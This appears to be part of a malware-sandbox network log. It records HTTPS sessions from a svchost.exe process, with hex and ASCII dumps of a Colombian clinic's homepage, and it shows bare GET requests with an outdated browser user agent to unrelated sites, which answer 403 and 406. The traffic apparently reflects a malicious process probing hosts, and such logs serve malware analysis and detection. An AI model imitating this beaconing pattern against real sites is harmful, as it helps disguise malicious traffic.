                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1147INData Raw: 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: tem-content"><span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1148INData Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65
                                                                                                                                                                                                                                                                                                      Data Ascii: ss="g-menu-item-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-me
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1149INData Raw: 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73
                                                                                                                                                                                                                                                                                                      Data Ascii: /span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></s
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1151INData Raw: 6c 61 20 65 73 70 65 72 61 6e 7a 61 20 64 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c
                                                                                                                                                                                                                                                                                                      Data Ascii: la esperanza del maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1152INData Raw: 20 6f 70 65 6e 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: openEffect: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1153INData Raw: 70 5f 61 68 6f 6c 69 63 27 29 3b 0d 0a 09 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: p_aholic');refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1155INData Raw: 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69
                                                                                                                                                                                                                                                                                                      Data Ascii: ble "><div class="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></di
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1156INData Raw: 6b 20 68 69 64 64 65 6e 2d 70 68 6f 6e 65 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20
                                                                                                                                                                                                                                                                                                      Data Ascii: k hidden-phone"><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1157INData Raw: 6d 61 67 65 73 2f 68 6f 6d 65 2f 61 70 6f 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69
                                                                                                                                                                                                                                                                                                      Data Ascii: mages/home/apoyo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnsti
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1159INData Raw: 61 63 69 6f 6e 22 3e 56 61 63 75 6e 61 63 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                                                      Data Ascii: acion">Vacunacin</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1160INData Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                      Data Ascii: "><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1161INData Raw: 65 33 61 65 61 32 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: e3aea2">[email&#160;protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Con
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1163INData Raw: 6c 61 73 73 3d 22 67 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d
                                                                                                                                                                                                                                                                                                      Data Ascii: lass="g-title">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1164INData Raw: 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22
                                                                                                                                                                                                                                                                                                      Data Ascii: div></div></div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title=""
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1165INData Raw: 35 30 63 0d 0a 3d 22 67 2d 73 6f 63 69 61 6c 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a
                                                                                                                                                                                                                                                                                                      Data Ascii: 50c="g-social-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/j
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1167INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      66192.168.2.524426185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1167OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1167INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:36 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:36 UTC1167INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      67192.168.2.52445175.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1168OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1168INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:37 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1168INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      68192.168.2.52442449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:37 UTC1169OUTGET / HTTP/1.1
